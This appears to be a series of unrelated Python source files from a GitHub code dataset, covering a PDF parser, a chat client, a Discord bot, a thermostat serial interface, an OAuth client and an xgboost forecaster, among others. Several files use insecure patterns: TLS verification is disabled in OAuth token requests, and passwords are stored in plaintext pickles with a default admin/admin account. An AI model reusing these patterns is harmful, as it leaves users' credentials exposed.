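# A quick standalone sketch of the tika call this script builds on (the\n # \"/tmp/example.pdf\" path is hypothetical, added only for illustration):\n # parser.from_file returns a dict whose 'content' key holds the extracted\n # text (or None when the PDF has no text layer), e.g.\n # raw = parser.from_file(\"/tmp/example.pdf\")\n # print(raw[\"content\"][:200] if raw[\"content\"] else \"no text layer\")\n 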
# Check to see if the processed folder exists\n x = datetime.datetime.now()\n proc_dir = directory + \"/Processed-\" + x.strftime(\"%G-%m-%d\")\n os.makedirs(proc_dir, exist_ok=True)\n\n # Open the import file\n out_file = open(directory + \"/import-data.csv\", \"w+\")\n\n # Print a header\n print_header(out_file)\n\n # Retrieve all of the files in the current director\n files = glob.glob(directory + '/*.pdf')\n\n # Iterate the reports\n for f in files:\n # Parse the current report\n parse_report(f, out_file)\n\n # Move the current file into the processed folder\n shutil.move(f, proc_dir + \"/\" + os.path.basename(f))\n\n # close the file\n out_file.close()\n\n\ndef parse_report(in_file, out_file):\n raw = parser.from_file(in_file)\n text = raw['content']\n\n # Grab our counts\n data = {\n \"date\": os.path.splitext(os.path.basename(in_file))[0],\n \"invalid\": text.count(\"Invalid\"),\n \"medicine\": text.count(\"Medicine\"),\n \"dental\": text.count(\"Dental\"),\n \"nursing\": text.count(\"Nursing\"),\n \"public\": text.count(\"Public\")\n }\n\n # Output our counts\n print_rows(data, out_file)\n\n\ndef print_header(out_file):\n out_file.write(\"Report Date,\"\n \"School,\"\n \"Count\\n\")\n\n\ndef print_rows(data, out_file):\n out_file.write(f\"{data['date']}, \"\n \"School of Medicine,\"\n f\"{data['medicine']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Dentistry,\"\n f\"{data['dental']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Nursing,\"\n f\"{data['nursing']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"School of Public Health,\"\n f\"{data['public']}\\n\")\n\n out_file.write(f\"{data['date']}, \"\n \"Invalid,\"\n f\"{data['invalid']}\\n\")\n\n\nif __name__ == '__main__':\n test_dir = \"/Users/dking/OneDrive - University of Louisville/Kornhauser/2021/Badge Data/Reports\"\n run(test_dir)\n\n # run(os.getcwd())\n","repo_name":"grimsmath/korn-lenel","sub_path":"tika-parser.py","file_name":"tika-parser.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6853265641","text":"import pickle\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport socket\nimport threading\nimport os\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n\ndef show_about_info():\n messagebox.showinfo(\"关于\", \"3406\")\n\n\nclass Chat(object):\n def __init__(self):\n self.IP = \"192.168.1.105\"\n\n self.PORT = 9999\n\n self.window = Tk()\n self.window.title(\"3406聊天室\")\n frame = Frame(self.window).pack()\n\n ws = self.window.winfo_screenwidth()\n hs = self.window.winfo_screenheight()\n x = int((ws / 2) - (300 / 2))\n y = int((hs / 2) - (300 / 2))\n self.window.geometry(\"{}x{}+{}+{}\".format(500, 350, x, y))\n self.window.resizable(0, 0)\n\n menu_bar = Menu(self.window)\n self.window.config(menu=menu_bar)\n about_menu = Menu(menu_bar, tearoff=0)\n menu_bar.add_cascade(label=\"选项\", menu=about_menu)\n about_menu.add_command(label=\"关于\", command=show_about_info)\n\n self.text = Text(frame)\n self.text.pack(anchor=W)\n self.text.configure(state=\"disabled\")\n self.entry = Entry(frame)\n self.entry.pack(side=LEFT, expand=YES, fill=X, anchor=W)\n self.entry.focus_force()\n self.entry.bind(\"<Return>\", self.send_data)\n self.button = Button(frame, text=\"发送\", command=self.send_data)\n self.button.pack(side=RIGHT, anchor=W)\n\n self.conn()\n self.send_threading = threading.Thread(target=self.send_data, args=(1,))\n self.recive_threading = 
threading.Thread(target=self.recive_data)\n self.send_threading.setDaemon(True)\n self.recive_threading.setDaemon(True)\n self.send_threading.start()\n self.recive_threading.start()\n\n self.window.mainloop()\n\n def conn(self):\n try:\n s.connect((self.IP, self.PORT))\n except:\n messagebox.showerror(\"Error\", \"错误,服务器未开启!\")\n self.window.destroy()\n\n def recive_data(self):\n # global name\n while True:\n data = s.recv(1024)\n data = data.decode(\"utf-8\")\n print(data)\n\n self.text.configure(state=\"normal\")\n self.text.insert(END, data + \"\\n\")\n self.text.see(END)\n self.text.configure(state=\"disabled\")\n\n def send_data(self, event):\n try:\n data = self.entry.get()\n # print(data)\n if data is not None:\n if os.path.exists(\"name.txt\"):\n with open(\"name.txt\", \"r\") as f:\n name = f.read()\n data = name + \":\" + data\n s.send(data.encode(\"utf-8\"))\n self.entry.delete(0, 'end')\n\n except:\n messagebox.showerror(\"Error\", \"错误,服务器未开启!\")\n quit(1)\n\n\nclass Account(object):\n def __init__(self):\n self.window = Tk()\n self.window.title(\"登陆\")\n self.window.geometry(\"450x300\")\n canvas = Canvas(self.window, height=200, width=500)\n image_file = PhotoImage(file=\"welcome.gif\")\n canvas.create_image(0, 0, anchor=\"nw\", image=image_file)\n canvas.pack(side=\"top\")\n\n Label(self.window, text=\"用户名:\").place(x=50, y=150)\n Label(self.window, text=\"密码:\").place(x=50, y=190)\n\n self.usr_name = StringVar()\n self.usr_name.set(\"在此输入用户名\")\n self.entry_name = Entry(self.window, textvariable=self.usr_name)\n self.entry_name.place(x=\"160\", y=\"150\")\n\n self.usr_pwd = StringVar()\n self.entry_pwd = Entry(self.window, textvariable=self.usr_pwd, show=\"*\")\n self.entry_pwd.place(x=160, y=190)\n\n btn_login = Button(self.window, text=\"登陆\", command=self.usr_login)\n btn_login.place(x=170, y=230)\n btn_sign_up = Button(self.window, text=\"注册\", command=self.usr_sign_up)\n btn_sign_up.place(x=270, y=230)\n\n self.window.mainloop()\n\n def usr_login(self):\n usr_name = self.usr_name.get()\n usr_pwd = self.usr_pwd.get()\n with open(\"name.txt\", \"wb\") as f:\n f.write(self.entry_name.get().encode(\"gbk\"))\n try:\n with open('usrs_info.pickle', 'rb') as usr_file:\n usrs_info = pickle.load(usr_file)\n except FileNotFoundError:\n with open('usrs_info.pickle', 'wb') as usr_file:\n usrs_info = {'admin': 'admin'}\n pickle.dump(usrs_info, usr_file)\n if usr_name in usrs_info:\n if usr_pwd == usrs_info[usr_name]:\n # messagebox.showinfo(title='Welcome', message='How are you? 
' + usr_name)\n self.window.destroy()\n Chat()\n else:\n messagebox.showerror(message='密码错误,请重试')\n else:\n is_sign_up = messagebox.askyesno('Welcome', '用户未注册,是否注册?')\n if is_sign_up:\n self.usr_sign_up()\n\n def usr_sign_up(self):\n def sign_to():\n np = new_pwd.get()\n npf = new_pwd_confirm.get()\n nn = new_name.get()\n try:\n with open(\"usrs_info.pickle\", \"rb\") as usr_file:\n exist_usr_info = pickle.load(usr_file)\n if np != npf:\n messagebox.showerror(\"Error\", \"密码必须相同!\")\n elif nn in exist_usr_info:\n messagebox.showerror(\"Error\", \"用户已注册!\")\n else:\n exist_usr_info[nn] = np\n with open(\"usrs_info.pickle\", \"wb\") as usr_file:\n pickle.dump(exist_usr_info, usr_file)\n messagebox.showinfo(\"Welcome\", \"注册成功!\")\n window_sign_up.destroy()\n\n except FileNotFoundError:\n with open('usrs_info.pickle', 'wb') as usr_file:\n usrs_info = {'admin': 'admin'}\n pickle.dump(usrs_info, usr_file)\n\n window_sign_up = Toplevel(self.window)\n window_sign_up.geometry(\"350x200\")\n window_sign_up.title(\"Sign up window\")\n\n new_name = StringVar()\n new_name.set(\"example@python.com\")\n Label(window_sign_up, text=\"用户名: \").place(x=10, y=10)\n entry_new_name = Entry(window_sign_up, textvariable=new_name)\n entry_new_name.place(x=150, y=10)\n\n new_pwd = StringVar()\n Label(window_sign_up, text=\"密码: \").place(x=10, y=50)\n entry_usr_pwd = Entry(window_sign_up, textvariable=new_pwd, show=\"*\")\n entry_usr_pwd.place(x=150, y=50)\n\n new_pwd_confirm = StringVar()\n Label(window_sign_up, text=\"确认密码: \").place(x=10, y=90)\n entry_usr_pwd_confirm = Entry(window_sign_up, textvariable=new_pwd_confirm, show=\"*\")\n entry_usr_pwd_confirm.place(x=150, y=90)\n\n btn_comfirm_sign_up = Button(window_sign_up, text=\"注册\", command=sign_to)\n btn_comfirm_sign_up.place(x=150, y=130)\n\n\nif __name__ == '__main__':\n # Account()\n Chat()\n","repo_name":"morestart/chatting","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73279134849","text":"#bot para discord criado como projeto final do Bootcamp DB1 Start\n\n#bibliotecas usadas no projeto\nimport discord\nimport config\nimport asyncio\n\n#iniciando o bot\nintents = discord.Intents.default()\nintents.message_content = True\nclient =discord.Client(intents=intents)\n\n#eventos que o bot irá responder\n@client.event\nasync def on_ready():\n print('online.')\n \n@client.event\nasync def on_message(mensagem):\n if mensagem.author == client.user:\n return\n await mensagem.channel.send('Bem-vindo!')\n\nasync def setup():\n print('Setting up...')\n\nasync def main(): \n await setup()\n await client.start(config.TOKEN)\n\nasyncio.run(main())","repo_name":"zanlucaslaiz/bot_discord_db1Start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30544294577","text":"from typing import List\nfrom twitter import Friend\nfrom folium import Map, FeatureGroup, Marker, Icon\n\n\ndef build_map(friends: List[Friend]) -> Map:\n html_map = Map(zoom_start=5)\n points_fg = FeatureGroup(name=\"Friends\")\n for friend in friends:\n points_fg.add_child(Marker(location=friend.location, popup=friend.username, icon=Icon()))\n html_map.add_child(points_fg)\n\n return 
html_map\n","repo_name":"amytnyk/TwitterFriend","sub_path":"mapbuilder.py","file_name":"mapbuilder.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7434176402","text":"from flask import render_template, request, redirect, url_for, abort, flash, jsonify\nfrom . import main\nimport os\n\n# from .forms import [form_name]\nfrom ..models import Teachers\nfrom .. import db, photos\nfrom flask_login import login_required, current_user, logout_user, fresh_login_required\nimport markdown2\n\n# General Application Data\nfrom config import appData\n\n@main.route('/')\n@login_required\ndef index():\n '''\n View root page function that returns the index page \n '''\n title = 'Ndogo Secondary School | Home'\n context = {\n 'title' : title,\n 'appData' : appData,\n 'user' : current_user #Teachers.query.filter_by(id = current_user.id).first()\n }\n return render_template( 'dashboard.html', context = context )\n\n@main.route('/api/all_students')\ndef stud_api():\n '''\n '''\n students = Teachers.query.all()\n return jsonify({ 'data' : students })\n\n@main.route('/user/')\n@login_required\ndef profile(id):\n user = current_user\n title = f'{user.firstName}\\'s profile.'\n context = {\n 'title' : title,\n 'appData' : appData,\n 'user' : user\n }\n if id != user.id:\n return redirect(url_for('main.profile', id = current_user.id))\n return render_template(\"profile/profile.html\", context = context)\n\n\n\n\n\n# @main.route('/user//update',methods = ['GET','POST'])\n# @login_required\n# def update_profile(uname):\n# user = User.query.filter_by(username = uname).first()\n# if user is None:\n# abort(404)\n# form = UpdateProfile()\n# if form.validate_on_submit():\n# user.bio = form.bio.data\n# db.session.add(user)\n# db.session.commit()\n# return redirect(url_for('.profile', uname = user.username ))\n# return render_template('profile/update.html', form = form, user = user )\n","repo_name":"HarryThuku/Group-of-Schools","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18413150591","text":"import json\nfrom pathlib import Path\nimport os\nimport pandas as pd\nimport json\nimport typing\nfrom typing import List, Dict\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom random import seed\nids, answers = [], []\n\n\ndef main(args):\n with open(os.path.join(\"ckpt\", \"qa\", \"infer\", \"predict_predictions.json\"), \"r\", encoding=\"utf-8\") as f:\n data = json.load(f)\n for id, ans in data.items():\n ids.append(id)\n answers.append(ans)\n\n df = pd.DataFrame({\n \"id\": ids,\n \"answer\": answers\n })\n\n df.to_csv(args.pred_path, index=False, encoding=\"utf-8\")\n\ndef parse_args() -> Namespace:\n parser = ArgumentParser()\n parser.add_argument(\n \"--pred_path\",\n type=Path,\n help=\"Directory to the final prediction csv.\",\n default=\"./prediction.csv\",\n )\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)","repo_name":"qqandy0120/ADL21-HW2","sub_path":"get_result.py","file_name":"get_result.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21185416049","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom starlette.status 
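# A usage sketch for the folium map builder above. Friend is a stand-in
# dataclass here (the record imports it from a local twitter module); only
# the .location and .username attributes matter.
from dataclasses import dataclass
from typing import Tuple

from folium import Map, FeatureGroup, Marker, Icon

@dataclass
class Friend:
    username: str
    location: Tuple[float, float]  # (latitude, longitude)

friends = [Friend("alice", (50.45, 30.52)), Friend("bob", (49.84, 24.03))]
html_map = Map(zoom_start=5)
fg = FeatureGroup(name="Friends")
for friend in friends:
    fg.add_child(Marker(location=friend.location, popup=friend.username, icon=Icon()))
html_map.add_child(fg)
html_map.save("friends_map.html")  # writes a standalone HTML page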
import HTTP_400_BAD_REQUEST\n\nfrom ..schemas import HTTPError\n\nprime_router = APIRouter()\n\n\n# Response model & responses are handy for docs\n@prime_router.get(\"/\", response_model=List[int], responses={HTTP_400_BAD_REQUEST: {\"model\": HTTPError}},\n tags=[\"primes\"])\n@prime_router.get(\"/{lower}/{upper}\", response_model=List[int], responses={HTTP_400_BAD_REQUEST: {\"model\": HTTPError}},\n tags=[\"primes\"])\ndef get_primes(lower: int = 0, upper: int = 10000) -> List[int]:\n if lower > 5000:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST,\n detail=\"Please don't overload me! Lower should be less than or equal to 5000.\")\n if upper > 50000:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST,\n detail=\"You exaggerator! Upper should be less than or equal to 50000.\")\n\n p = []\n\n for num in range(lower, upper + 1):\n if num > 1:\n for i in range(2, num):\n if (num % i) == 0:\n break\n else:\n p.append(num)\n\n return p\n","repo_name":"Eslih/basic-webapp","sub_path":"api/app/api/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"39946267031","text":"from sqlobject import *\n\nclass Model:\n\tclass Capture(SQLObject):\n\t\tname = StringCol(length = 255)\n\t\tcategory = ForeignKey('Category')\n\t\ttags = RelatedJoin('Tag')\n\t\tpath = StringCol(notNone = True)\n\t\ttimestamp = DateTimeCol(notNone=True)\n\t\tmimetype = StringCol(length = 255, notNone = True) # MIME type of the capture.\n\t\ttype = StringCol(length = 2) # Two-letter representation of the type of capture (screencast, area, window etc)\n\t\turl = StringCol() # Image's URL, if it exists. \n\t\trating = IntCol() # Rating out of five\n\t\tdef _get_data(self):\n\t\t\tf = open(self.path, 'rb')\n\t\t\tdata = image.read()\n\t\t\tf.close()\n\t\t\treturn data\n\t\tdef _set_data(self, value):\n\t\t\tdata = value # clearer variable name\n\t\t\tf = open(self.path, 'w')\n\t\t\tf.write(data)\n\t\t\tf.close()\n\t\t\treturn True\n\t\t\n\tclass Category(SQLObject):\n\t\tname = StringCol(length = 255)\n\t\tparent = IntCol(notNone = False)\n\t\ticon = StringCol()\n\t\t\n\tclass Tag(SQLObject):\n\t\tname = StringCol(length = 255)\n","repo_name":"donaldharvey/snappy","sub_path":"snappy/backend/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"40393323507","text":"\nimport serial\nimport glob\nimport sys\nimport bluetooth\nimport time\n\ndata_dict = {\n \"SN\": 0,\n \"Temp\": 0,\n \"MaxTemp\": 0,\n \"MinTemp\": 0,\n \"Alarm\": 0,\n \"Heater\": 0,\n \"Cooler\": 0,\n \"BatteryVoltage\": 0,\n \"PowerSavingMode\": 0\n}\nclass Connection:\n def __init__(self,Connection):\n self.Connection = Connection\n\nclass SerialPort():\n def __init__(self,port:str,baundrate=9600,time_out=1,Name=\"\"):\n self.port = port\n self.baundrate = baundrate\n self.time_out = time_out\n self.name = \"\"\n self._connection = None\n self._isConnected = False\n self.LastGet = {}\n def Connect(self):\n try:\n self._connection = serial.Serial(self.port,self.baundrate)\n except:\n return \"Connection Fail!!!\"\n else:\n self._isConnected = True\n return \"Connected\"\n \n def Disconnect(self):\n try:\n self._connection.close()\n except:\n return \"Disconnection Fail!!!\"\n else:\n self._isConnected = False\n return \"Disconnected\"\n\n def CheckConnection(self)->bool:\n self._isConnected = 
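# The prime route above trial-divides each candidate by every smaller integer,
# which is roughly O(n^2) over the range. Bounding the divisor at sqrt(num)
# yields the same output far faster; this helper is an illustration, not part
# of the original service.
from math import isqrt

def primes_between(lower: int, upper: int) -> list:
    return [num for num in range(max(lower, 2), upper + 1)
            if all(num % i for i in range(2, isqrt(num) + 1))]

assert primes_between(0, 30) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]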
self._connection.isOpen()\n return self._isConnected\n\n def GetCommandMessage(self,MaxTemp=200,MinTemp=200,AlarmState=2,HeaterState=2,CoolerState=2,PowerSavingMode=2):\n return bytes(f\"Set+{MaxTemp}+{MinTemp}+{AlarmState}+{HeaterState}+{CoolerState}+{PowerSavingMode}\",\"utf-8\")\n \n\n def SendCommand(self,MaxTemp=200,MinTemp=200,AlarmState=2,HeaterState=2,CoolerState=2,PowerSavingMode=2):\n if self.CheckConnection():\n try:\n self._connection.write(bytes(f\"Set+{MaxTemp}+{MinTemp}+{AlarmState}+{HeaterState}+{CoolerState}+{PowerSavingMode}\",\"utf-8\"))\n except:\n return False\n else:\n return True\n else:\n return False\n def Get(self,Trys = 4):\n if self.CheckConnection():\n self._connection.write(b\"Get+\")\n my_data = \"\"\n Trying = Trys\n while True:\n DATA = self._connection.readline()\n DATA = str(DATA,\"utf-8\")\n DATA = DATA.rstrip()\n data_list = DATA.split(\"+\")\n if data_list[0].isdigit():\n my_data = DATA\n break\n else:\n Trying -= 1\n self._connection.write(b\"Get+\")\n if Trying == 0:\n break\n time.sleep(0.2)\n \n return my_data\n\n def GetTemprature(self):\n if self.CheckConnection():\n self._connection.write(b\"Get+T+\")\n my_data = None\n Trying = 4 \n while True:\n try:\n DATA = self._connection.readline()\n DATA = str(DATA,\"utf-8\")\n data_list = DATA.split(\"+\")\n if len(data_list)>1:\n try:\n my_data = float(data_list[1])\n except:pass\n else:return my_data\n else:\n Trying -= 1\n if Trying == 0:\n break\n time.sleep(0.2)\n return float(my_data[1])\n except:return None\n\n\n\ndef SearchSerialports()->dict:\n if sys.platform.startswith('win'):\n ports = ['COM%s' % (i + 1) for i in range(256)]\n elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n ports = glob.glob('/dev/tty[A-Za-z]*')\n elif sys.platform.startswith('darwin'):\n ports = glob.glob('/dev/tty.*')\n else:\n raise EnvironmentError('Unsupported platform')\n\n result = dict()\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n result[s.name]=s.get_settings()\n\n except (OSError, serial.SerialException):\n pass\n return result\ndef SearchBluetooths():\n nearby_devices =bluetooth.discover_devices(lookup_names = True)\n return nearby_devices","repo_name":"saniar-mf/digital_thermostat","sub_path":"DesktopApplication/backend/Connection.py","file_name":"Connection.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10697488120","text":"from . 
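# A usage sketch for the SerialPort thermostat wrapper defined above; the
# module path and the port name are assumptions, and the misspelled names
# (baundrate, GetTemprature) are kept exactly as the class defines them.
from Connection import SerialPort  # the record's Connection.py

port = SerialPort("COM3", baundrate=9600)
if port.Connect() == "Connected":
    temp = port.GetTemprature()  # float, or None after its four retries
    print("current temperature:", temp)
    port.SendCommand(MaxTemp=30, MinTemp=18, AlarmState=1)
    port.Disconnect()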
import utils\r\nimport json\r\nimport requests\r\nimport urllib\r\nimport urllib2\r\nfrom requests.packages import urllib3\r\n\r\n\r\nclass Client(object):\r\n def __init__(self, client_id, client_secret, redirect_uri, \\\r\n authorization_uri, token_uri, openid_uri, user_uri=None):\r\n \"\"\"Constructor for OAuth 2.0 Client.\r\n\r\n :param client_id: Client ID.\r\n :type client_id: str\r\n :param client_secret: Client secret.\r\n :type client_secret: str\r\n :param redirect_uri: Client redirect URI: handle provider response.\r\n :type redirect_uri: str\r\n :param authorization_uri: Provider authorization URI.\r\n :type authorization_uri: str\r\n :param token_uri: Provider token URI.\r\n :type token_uri: str\r\n \"\"\"\r\n self.client_id = client_id\r\n self.client_secret = client_secret\r\n self.redirect_uri = redirect_uri\r\n self.authorization_uri = authorization_uri\r\n self.token_uri = token_uri\r\n self.openid_uri = openid_uri\r\n self.user_uri = user_uri\r\n\r\n def get_user_info(self, access_token, openid):\r\n response = requests.get(\"%sget_user_info/\" %self.user_uri, params=\r\n {'access_token': access_token, 'client_id': self.client_id, \"openid\": openid}, verify=False)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n def get_openid(self, access_token):\r\n response = requests.get(self.openid_uri, params={'access_token': access_token}, verify=False)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n @property\r\n def default_response_type(self):\r\n return 'code'\r\n\r\n @property\r\n def default_grant_type(self):\r\n return 'authorization_code'\r\n\r\n def http_post(self, url, data=None):\r\n \"\"\"POST to URL and get result as a response object.\r\n\r\n :param url: URL to POST.\r\n :type url: str\r\n :param data: Data to send in the form body.\r\n :type data: str\r\n :rtype: requests.Response\r\n \"\"\"\r\n # if not url.startswith('https://'):\r\n # raise ValueError('Protocol must be HTTPS, invalid URL: %s' % url)\r\n return requests.post(url, data, verify=False)\r\n\r\n\r\n def get_authorization_code_uri(self, **params):\r\n \"\"\"Construct a full URL that can be used to obtain an authorization\r\n code from the provider authorization_uri. 
Use this URI in a client\r\n frame to cause the provider to generate an authorization code.\r\n\r\n :rtype: str\r\n \"\"\"\r\n if 'response_type' not in params:\r\n params['response_type'] = self.default_response_type\r\n params.update({'client_id': self.client_id,\r\n 'redirect_uri': self.redirect_uri})\r\n return utils.build_url(self.authorization_uri, params)\r\n\r\n def get_token(self, **params):\r\n \"\"\"Get an access token from the provider token URI.\r\n\r\n :param code: Authorization code.\r\n :type code: str\r\n :return: Dict containing access token, refresh token, etc.\r\n :rtype: dict\r\n \"\"\"\r\n if 'grant_type' not in params:\r\n params['grant_type'] = self.default_grant_type\r\n params.update({'client_id': self.client_id,\r\n 'client_secret': self.client_secret})\r\n if params['grant_type'] != 'refresh_token':\r\n params['redirect_uri'] = self.redirect_uri\r\n response = self.http_post(self.token_uri, params)\r\n try:\r\n return response.json()\r\n except TypeError:\r\n return response.json\r\n\r\n","repo_name":"zouyapeng/BBS","sub_path":"apps/account/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"20051223403","text":"import numpy as np\n\nfrom sklearn.utils.testing import (assert_equal, assert_array_equal,\n assert_array_almost_equal,\n assert_almost_equal)\nfrom sklearn.metrics import log_loss, roc_auc_score\n\nfrom wolpert.wrappers.base import _scores\n\nRANDOM_STATE = 498595\n\n\ndef test_scores():\n np.random.seed(RANDOM_STATE)\n ytrue = np.random.randint(2, size=10)\n ypreds = np.random.rand(10)\n\n # check that it works with a single predefined score\n logloss = _scores(ytrue, ypreds, 'log_loss')['score']\n assert_almost_equal(logloss, 1.2694, decimal=4)\n\n # check that works with metric\n logloss = _scores(ytrue, ypreds, log_loss)['score']\n assert_almost_equal(logloss, 1.2694, decimal=4)\n\n # check that it works with list\n scores = _scores(ytrue, ypreds, ('log_loss', roc_auc_score))\n assert_array_equal([\"score\", \"score1\"], list(scores.keys()))\n assert_array_almost_equal([1.2694, 0.24], list(scores.values()),\n decimal=4)\n\n # check that it works with dict\n scores = _scores(ytrue, ypreds, {\"logloss\": 'log_loss',\n \"roc_auc\": roc_auc_score})\n assert_array_equal([\"logloss\", \"roc_auc\"], list(scores.keys()))\n assert_array_almost_equal([1.2694, 0.24], list(scores.values()),\n decimal=4)\n","repo_name":"caioaao/wolpert","sub_path":"wolpert/wrappers/tests/base_test.py","file_name":"base_test.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"43"} +{"seq_id":"22607471191","text":"from django.db import models\n\nfrom mycomm.models.department import Department\nfrom mycomm.models.group import Group\nfrom mycomm.models.user import User\n\n\nclass Board(models.Model):\n name = models.CharField(\n verbose_name='게시판 이름',\n max_length=255,\n null=False,\n blank=False\n )\n is_hidden = models.BooleanField(\n verbose_name='익명 여부',\n null=False,\n default=False\n )\n\n department = models.ForeignKey(\n verbose_name='학과',\n to=Department,\n on_delete=models.CASCADE,\n null=False,\n related_name='department_board'\n )\n group = models.ForeignKey(\n verbose_name='그룹',\n to=Group,\n on_delete=models.CASCADE,\n null=True,\n related_name='group_board'\n )\n managers = models.ManyToManyField(\n verbose_name='관리자 명단',\n to=User,\n null=False,\n 
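# The wolpert test above pins down a small convention: the metrics argument
# may be one scorer, a sequence, or a dict, and the result is always a dict
# of named scores ("score", "score1", ... when no names are given). A
# standalone sketch of that convention; the string registry is assumed.
from sklearn.metrics import log_loss, roc_auc_score

_NAMED = {"log_loss": log_loss, "roc_auc_score": roc_auc_score}

def scores(y_true, y_pred, metrics):
    if isinstance(metrics, dict):
        items = list(metrics.items())
    elif isinstance(metrics, (list, tuple)):
        items = [("score" if i == 0 else "score%d" % i, m)
                 for i, m in enumerate(metrics)]
    else:
        items = [("score", metrics)]
    return {name: (_NAMED[m] if isinstance(m, str) else m)(y_true, y_pred)
            for name, m in items}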
related_name='manager_board'\n )\n","repo_name":"Moong-glE/my-community-backend","sub_path":"mycomm/models/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"75398114370","text":"from dateutil.relativedelta import relativedelta\nimport datetime\nfrom tqdm import tqdm\nimport xgboost as xgb\nimport sqlite3\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\n\ndef dbPath()-> Path:\n cwd = Path.cwd()\n dc2 = cwd.parent\n db= dc2.joinpath(\"data/database_final.db\")\n return db\n\ndef modelPath(lsoaCode:str) -> Path:\n cwd = Path.cwd()\n dc2 = cwd.parent\n modelPath = dc2.joinpath(f\"data/models/{lsoaCode}.bin\")\n return modelPath\n\n\ndef makeAllFeatures():\n conn = sqlite3.connect(dbPath())\n query_lsoa_codes = \"\"\"\n SELECT geogcode\n FROM lsoa_code_to_name\n \"\"\"\n lsoa_codes = pd.read_sql(query_lsoa_codes, conn)\n\n query_unemployement = \"\"\"\n SELECT * \n FROM montly_unemployement_claimant_count_by_lsoa_barnet\n \"\"\"\n unemployement = pd.read_sql(query_unemployement, conn)\n\n unemployement.dropna(inplace=True)\n unemployement.drop(columns=\"index\", inplace=True)\n unemployement = unemployement[(unemployement[\"date\"]<\"2020\") & (unemployement[\"date\"]>\"2012\")]\n\n unemployement = unemployement[unemployement[\"geogcode\"]!=\"Column Total\"].copy()\n lsoa_code_list = lsoa_codes[lsoa_codes[\"geogcode\"] != \"Column Total\"][\"geogcode\"].to_list()\n allFeatures = pd.DataFrame(columns=lsoa_code_list, index=pd.to_datetime(unemployement[\"date\"].unique()))\n\n for row in unemployement.index:\n allFeatures[unemployement[\"geogcode\"][row]][unemployement[\"date\"][row]] = unemployement[\"value\"][row]\n \n shiftColumnList = []\n for code in lsoa_code_list:\n tempDF = pd.DataFrame(columns=[f\"{code}_shift_{i+1}\" for i in range(12)])\n for i in range(12):\n tempDF[f\"{code}_shift_{i+1}\"] = allFeatures[code].shift(i+1)\n shiftColumnList.append(tempDF.copy())\n allShifts = pd.concat(shiftColumnList, axis=1)\n allFeatures = pd.concat([allFeatures, allShifts], axis=1)\n allFeatures = allFeatures.dropna()\n conn.close()\n return allFeatures, lsoa_code_list\n\n\ndef main():\n print(\"LOADING UNEMPLOYEMENT\")\n allFeatures, lsoa_code_list = makeAllFeatures()\n print(\"UNEMPLOYEMENT LOADED\")\n lastRow = allFeatures.tail(1)\n present = pd.to_datetime(list(lastRow.index)[0])\n # print(present)\n lastArrArr = lastRow.to_numpy()\n lastArr = lastArrArr[0].T\n # names = lastRow.columns\n # print(lastArr[:].shape)\n pred = {\"LSOA\": lsoa_code_list}\n for i in tqdm(range(12)):\n tempGuess = np.empty(len(lsoa_code_list))\n for j, code in enumerate(lsoa_code_list):\n model = xgb.XGBRegressor()\n model.load_model(modelPath(code))\n X = lastArr[:-211].reshape(1,-1).copy()\n guess = model.predict(X)\n tempGuess[j] = guess[0]\n pred[pd.to_datetime(present+relativedelta(months=i+1))] = tempGuess\n last_arr_slice = lastArr[:-211].copy()\n lastArr = np.concatenate([tempGuess, last_arr_slice])\n\n\n return pd.DataFrame(pred)\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DC2-G19/policeResourceAllocation","sub_path":"predicting_unemployement.py","file_name":"predicting_unemployement.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} 